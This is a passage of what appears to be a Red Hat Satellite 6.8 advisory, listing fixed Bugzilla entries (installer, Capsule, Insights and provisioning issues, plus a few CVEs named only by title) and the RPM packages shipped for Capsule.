1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule
1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names
1849656 - ERROR! You cannot use loops on 'import_tasks' statements. You should use 'include_tasks' instead.
1849680 - Task progress decimal precision discrepancy between UI, CLI, and API
1849869 - Unable to recycle the dynflow executor
1850355 - Auth Source Role Filters are not working in Satellite 6.8
1850536 - Can't add RHEV with APIv3 through Hammer
1850914 - Checksum type "sha256" is not available for all units in the repository. Make sure those units have been downloaded
1850934 - Satellite-installer failed with error "Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)"
1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates
1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9
1851167 - Autoattach -> "undefined" subscription added
1851176 - Subscriptions do not provide any repository sets
1851952 - "candlepin_events FAIL Not running" and wont restart
1852371 - Allow http proxy ports by default
1852723 - Broken link for documentation on installation media page
1852733 - Inventory upload documentation redirects to default location
1852735 - New version of the plugin is available: 2.0.8
1853076 - large capsule syncs cause slow processing of dynflow tasks/steps
1853200 - foreman-rake-db:migrate Fails on "No indexes found on foreman_tasks_locks with the options provided"
1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7
1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh
1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views
1853572 - Broken documentation link for 'RHV' in Compute Resource
1854138 - System purpose status should show as 'disabled' when Satellite is in Simple Content Access mode.
1854397 - Compliance reports are not being uploaded to satellite.
1854530 - PG::NotNullViolation when syncing hosts from cloud
1855008 - Host parameters are set after the host is created.
1855254 - Links to documentation broken in HTTP Proxies setup
1855348 - katello_applicability accidentally set to true at install
1855710 - 'Ensure RPM repository is configured and enabled' task says 'FIXME'
1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page.
1856379 - Add missing VM creation tests
1856401 - [RFE] Add module to create HTTP Proxy
1856831 - New version of the plugin is available: 2.0.9
1856837 - undefined method '#httpboot' for NilClass::Jail (NilClass) when creating an IPv6 only host
1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500
1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos
1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos
1857377 - Capsule Upgrade Playbook fails with "Failed to initialize: NoMethodError - undefined method default_capsule' for Katello:Module"
1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError
1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename.
1857726 - Warnings are shown during the satellite package installation on RHEL 7.9
1858237 - Upgraded Satellite has duplicated katello_pools indexes
1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user
1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite
1858855 - Creating compute resources on IPV6 network does not fail gracefully
1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf
1859194 - load_hosts macro duplicated in a list of macros
1859276 - Need to update the deprecation warning message on Statistics and Trends page.
1859705 - Tomcat is not running on fresh Capsule installation
1859929 - User can perform other manifest actions while the first one starts
1860351 - 'Host - compare content hosts packages' report fails with error 'undefined method '#first' for NilClass'
1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed
1860422 - Host with remediations can't be removed
1860430 - 'Host - compare content hosts packages' report: Safemode doesn't allow to access 'version'...
1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service
1860519 - Browsing capsule /pub directory with https fails with forbidden don't have permission to access /pub/ error.
1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8
1860587 - Documentation link in Administer -> About pointing to 6.6 document.
1860835 - Installed Packages not displayed on About page
1860957 - Unable to select an organization for sync management
1861367 - Import Template sync never completes
1861397 - UI dialog for Capsule Upgrade Playbook job doesn't state whitelist_options is required
1861422 - Error encountered while handling the response, replying with an error message ('plugin_config')
1861656 - smart-proxy-openscap-send command fails to upload reports to satellite.
1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request
1861766 - Add ability to list traces by host with hammer
1861807 - Cancel/Abort button should be disabled once REX job is finish
1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer
1861831 - satellite-change-hostname cannot change the satellite hostname after failing.
1861890 - Recommended repos do not match Satellite version
1861970 - Content -> Product doesn't work when no organization is selected
1862135 - updating hosts policy using bulk action fails with sql error
1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite.
1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6
1865871 - Obfuscated hosts do not have domain reported
1865872 - Templates doc - examples on onepage.html are not processed
1865874 - Add inventory status to host
1865876 - Make recommendations count in hosts index a link
1865879 - Add automatic scheduler for insights sync
1865880 - Add an explanation how to enable insights sync
1865928 - Templates documentation help page has hard-coded Satellite setting value
1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently
1866029 - Templates DSL documentation: Parts of description are put in <pre> tag
1866436 - host search filter does not work in job invocation page
1866461 - Run action is missing in job templates page
1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page
1866700 - Hammer CLI is missing "resolve" (traces) option for katello-tracer
1866710 - Wrong API endpoint path referenced for resolving host traces
1867239 - hammer content-view version incremental-update fails with ISE
1867287 - Error Row was updated or deleted by another transaction when deleting docker repository
1867311 - Upgrade fails when checkpoint_segments postgres parameter configured
1867399 - Receptor-satellite isn't able to deal with jobs where all the hosts are unknown to satellite
1867895 - API Create vmware ComputeResource fails with "Datacenter can't be blank"
1868183 - Unable to change virt-who hypervisor location.
1868971 - Receptor installation job doesn't properly escape data it puts into receptor.conf
1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)' messages come in upgrade and installation.
1869812 - Tasks fail to complete under load
1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow
1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)
1871434 - theme css ".container" class rule is too generic
1871729 - ansible-runner implementation depends on third party repository for ansible-runner package.
1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout
1871978 - Bug in provisioning_template Module
1872014 - Enable web console on host error in "Oops, we're sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console"
1872041 - Host search returns incorrect result
1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result
1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover
1874143 - Red Hat Inventory Uploads does not use proxy
1874160 - Changing Content View of a Content Host needs to better inform the user around client needs
1874168 - Sync Plan fails with 'uninitialized constant Actions::Foreman::Exception'
1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file
1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)
1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow
1874176 - Unable to search by value of certain Hostgroup parameter
1874422 - Hits Sync uses only old proxy setting
1874619 - Hostgroup tag is never reported in slice
1875357 - After upgrade server response check failed for candlepin.
1875426 - Azure VM provision fails with errorrequests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`
1875660 - Reporting Template macros host_cores is not working as expected
1875667 - Audit page list incorrect search filter
1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only
1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding
1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries
1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-.csv
1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-.csv
1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-.csv
1878194 - In Capsule upgrade, "yum update" dump some error messages.
1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled
1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections
1878850 - creating host from hg doesn't resolves the user-data template
1879151 - Remote execution status not updating with large number of hosts
1879448 - Add hits details to host details page
1879451 - Stop uploading if Satellite's setting is disconnected
1879453 - Add plugin version to report metadata
1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP
1880637 - [6.8] satellite-installer always runs upgrade steps
1881066 - Safemode doesn't allow to access 'host_cores' on #
1881078 - Use Passenger instead of Puma as the Foreman application server
1881988 - [RFE] IPv6 support for Satellite 6.8
1882276 - Satellite installation fails at execution of '/usr/sbin/foreman-rake -- config -k 'remote_execution_cockpit_url' -v '/webcon/=%{host}''
1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results
1883093 - installer-upgrade failed with error "Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)"
1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error "HTTP error (500 - Internal Server Error): Unable to register system, not all services available"
1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals
1887489 - Insights rules can't be loaded on freshly installed Satellite system
1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO
- Package List:
Red Hat Satellite Capsule 6.8:
Source: ansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm ansible-runner-1.4.6-1.el7ar.src.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm ansiblerole-insights-client-1.7.1-1.el7sat.src.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm createrepo_c-0.7.4-1.el7sat.src.rpm foreman-2.1.2.19-1.el7sat.src.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm foreman-discovery-image-3.6.7-1.el7sat.src.rpm foreman-discovery-image-service-1.0.0-3.el7sat.src.rpm foreman-installer-2.1.2.8-1.el7sat.src.rpm foreman-proxy-2.1.2-2.el7sat.src.rpm future-0.16.0-11.el7sat.src.rpm gofer-2.12.5-7.el7sat.src.rpm hfsplus-tools-332.14-12.el7.src.rpm katello-3.16.0-1.el7sat.src.rpm katello-certs-tools-2.7.1-1.el7sat.src.rpm katello-client-bootstrap-1.7.5-1.el7sat.src.rpm katello-selinux-3.4.0-1.el7sat.src.rpm kobo-0.5.1-1.el7sat.src.rpm libmodulemd-1.7.0-1.pulp.el7sat.src.rpm libsolv-0.7.4-4.pulp.el7sat.src.rpm libwebsockets-2.4.2-2.el7.src.rpm livecd-tools-20.4-1.6.el7sat.src.rpm mod_xsendfile-0.12-11.el7sat.src.rpm ostree-2017.1-2.atomic.el7.src.rpm pulp-2.21.3-1.el7sat.src.rpm pulp-docker-3.2.7-1.el7sat.src.rpm pulp-katello-1.0.3-1.el7sat.src.rpm pulp-ostree-1.3.1-2.el7sat.src.rpm pulp-puppet-2.21.3-2.el7sat.src.rpm pulp-rpm-2.21.3-2.el7sat.src.rpm puppet-agent-6.14.0-2.el7sat.src.rpm puppet-agent-oauth-0.5.1-3.el7sat.src.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm puppetlabs-stdlib-4.25.1-2.el7sat.src.rpm puppetserver-6.13.0-1.el7sat.src.rpm pycairo-1.16.3-9.el7sat.src.rpm pygobject3-3.28.3-2.el7sat.src.rpm python-amqp-2.2.2-5.el7sat.src.rpm python-anyjson-0.3.3-11.el7sat.src.rpm python-apypie-0.2.2-1.el7sat.src.rpm python-billiard-3.5.0.3-3.el7sat.src.rpm python-blinker-1.3-2.el7sat.src.rpm python-celery-4.0.2-9.el7sat.src.rpm python-click-6.7-9.el7sat.src.rpm python-crane-3.3.1-9.el7sat.src.rpm python-daemon-2.1.2-7.el7at.src.rpm python-django-1.11.29-1.el7sat.src.rpm python-flask-0.12.2-4.el7sat.src.rpm python-gnupg-0.3.7-1.el7ui.src.rpm python-isodate-0.5.4-12.el7sat.src.rpm python-itsdangerous-0.24-15.el7sat.src.rpm python-jinja2-2.10-10.el7sat.src.rpm python-jmespath-0.9.0-6.el7_7.src.rpm python-kid-0.9.6-11.el7sat.src.rpm python-kombu-4.0.2-13.el7sat.src.rpm python-lockfile-0.11.0-10.el7ar.src.rpm python-markupsafe-0.23-21.el7sat.src.rpm python-mongoengine-0.10.5-2.el7sat.src.rpm python-nectar-1.6.2-1.el7sat.src.rpm python-oauth2-1.5.211-8.el7sat.src.rpm python-okaara-1.0.37-2.el7sat.src.rpm python-pexpect-4.6-1.el7at.src.rpm python-psutil-5.0.1-3.el7sat.src.rpm python-ptyprocess-0.5.2-3.el7at.src.rpm python-pycurl-7.43.0.2-4.el7sat.src.rpm python-pymongo-3.2-2.el7sat.src.rpm python-qpid-1.35.0-5.el7.src.rpm python-semantic_version-2.2.0-6.el7sat.src.rpm python-simplejson-3.2.0-1.el7sat.src.rpm python-twisted-16.4.1-12.el7sat.src.rpm python-vine-1.1.3-6.el7sat.src.rpm python-werkzeug-0.12.2-5.el7sat.src.rpm python-zope-interface-4.0.5-4.el7.src.rpm qpid-cpp-1.36.0-28.el7amq.src.rpm qpid-dispatch-1.5.0-4.el7.src.rpm qpid-proton-0.28.0-3.el7.src.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm repoview-0.6.6-11.el7sat.src.rpm rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm rubygem-highline-1.7.8-3.el7sat.src.rpm rubygem-newt-0.9.6-3.el7sat.src.rpm rubygem-oauth-0.5.4-2.el7sat.src.rpm saslwrapper-0.22-5.el7sat.src.rpm satellite-6.8.0-1.el7sat.src.rpm satellite-installer-6.8.0.11-1.el7sat.src.rpm tfm-6.1-1.el7sat.src.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm tfm-rubygem-highline-1.7.8-4.el7sat.src.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm tfm-rubygem-logging-2.2.2-6.el7sat.src.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm tfm-rubygem-rack-2.2.3-1.el7sat.src.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm tfm-rubygem-unf-0.1.3-7.el7sat.src.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm
noarch: ansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm ansible-runner-1.4.6-1.el7ar.noarch.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm ansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm crane-selinux-3.4.0-1.el7sat.noarch.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm foreman-debug-2.1.2.19-1.el7sat.noarch.rpm foreman-discovery-image-3.6.7-1.el7sat.noarch.rpm foreman-installer-2.1.2.8-1.el7sat.noarch.rpm foreman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm foreman-proxy-2.1.2-2.el7sat.noarch.rpm foreman-proxy-content-3.16.0-1.el7sat.noarch.rpm foreman-proxy-journald-2.1.2-2.el7sat.noarch.rpm katello-certs-tools-2.7.1-1.el7sat.noarch.rpm katello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm katello-common-3.16.0-1.el7sat.noarch.rpm katello-debug-3.16.0-1.el7sat.noarch.rpm kobo-0.5.1-1.el7sat.noarch.rpm pulp-admin-client-2.21.3-1.el7sat.noarch.rpm pulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm pulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm pulp-katello-1.0.3-1.el7sat.noarch.rpm pulp-maintenance-2.21.3-1.el7sat.noarch.rpm pulp-nodes-child-2.21.3-1.el7sat.noarch.rpm pulp-nodes-common-2.21.3-1.el7sat.noarch.rpm pulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm pulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm pulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm pulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm pulp-selinux-2.21.3-1.el7sat.noarch.rpm pulp-server-2.21.3-1.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm puppetserver-6.13.0-1.el7sat.noarch.rpm python-blinker-1.3-2.el7sat.noarch.rpm python-gnupg-0.3.7-1.el7ui.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-kid-0.9.6-11.el7sat.noarch.rpm python-mongoengine-0.10.5-2.el7sat.noarch.rpm python-nectar-1.6.2-1.el7sat.noarch.rpm python-oauth2-1.5.211-8.el7sat.noarch.rpm python-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-common-2.21.3-1.el7sat.noarch.rpm python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python-semantic_version-2.2.0-6.el7sat.noarch.rpm python2-amqp-2.2.2-5.el7sat.noarch.rpm python2-ansible-runner-1.4.6-1.el7ar.noarch.rpm python2-anyjson-0.3.3-11.el7sat.noarch.rpm python2-apypie-0.2.2-1.el7sat.noarch.rpm python2-celery-4.0.2-9.el7sat.noarch.rpm python2-click-6.7-9.el7sat.noarch.rpm python2-crane-3.3.1-9.el7sat.noarch.rpm python2-daemon-2.1.2-7.el7at.noarch.rpm python2-django-1.11.29-1.el7sat.noarch.rpm python2-flask-0.12.2-4.el7sat.noarch.rpm python2-future-0.16.0-11.el7sat.noarch.rpm python2-isodate-0.5.4-12.el7sat.noarch.rpm python2-itsdangerous-0.24-15.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-jmespath-0.9.0-6.el7_7.noarch.rpm python2-kombu-4.0.2-13.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-okaara-1.0.37-2.el7sat.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm python2-vine-1.1.3-6.el7sat.noarch.rpm python2-werkzeug-0.12.2-5.el7sat.noarch.rpm qpid-dispatch-tools-1.5.0-4.el7.noarch.rpm qpid-tools-1.36.0-28.el7amq.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm repoview-0.6.6-11.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-highline-1.7.8-3.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm satellite-capsule-6.8.0-1.el7sat.noarch.rpm satellite-common-6.8.0-1.el7sat.noarch.rpm satellite-debug-tools-6.8.0-1.el7sat.noarch.rpm satellite-installer-6.8.0.11-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm tfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm tfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm
x86_64: createrepo_c-0.7.4-1.el7sat.x86_64.rpm createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm hfsplus-tools-332.14-12.el7.x86_64.rpm hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm libwebsockets-2.4.2-2.el7.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm livecd-tools-20.4-1.6.el7sat.x86_64.rpm mod_xsendfile-0.12-11.el7sat.x86_64.rpm mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm ostree-2017.1-2.atomic.el7.x86_64.rpm ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm puppet-agent-6.14.0-2.el7sat.x86_64.rpm pycairo-1.16.3-9.el7sat.x86_64.rpm pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm 